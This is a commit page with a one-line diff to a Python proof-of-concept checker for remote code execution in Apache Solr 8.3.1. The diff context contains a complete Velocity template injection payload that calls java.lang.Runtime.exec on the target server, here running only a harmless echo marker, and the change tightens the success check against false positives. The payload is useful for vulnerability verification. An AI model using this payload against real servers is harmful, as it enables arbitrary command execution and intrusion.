update

1oid · Nov 16, 2021 · c2c8327 · c2c8327
1 parent d400a5e
commit c2c8327
Showing 1 changed file with 1 addition and 1 deletion.
diff --git a/solr/solr_8.3.1_rce.py → solr/solr_8_3_1_rce.py b/solr/solr_8.3.1_rce.py → solr/solr_8_3_1_rce.py
@@ -56,7 +56,7 @@ def _verify(self):
             target3 = target + "/solr/" + core3 + \
                 "/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27echo%20d0xdeadbeaf%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end"
             response = req.get(target3, headers=headers)
-            if response and response.status_code == 200 and "0xdeadbeaf" in response.text:
+            if response and response.status_code == 200 and "0xdeadbeaf" in response.text and 'v.template' not in response.text:
                 result['VerifyInfo'] = {}
                 result['VerifyInfo']['URL'] = '{}:{}'.format(
                     pr.hostname, port)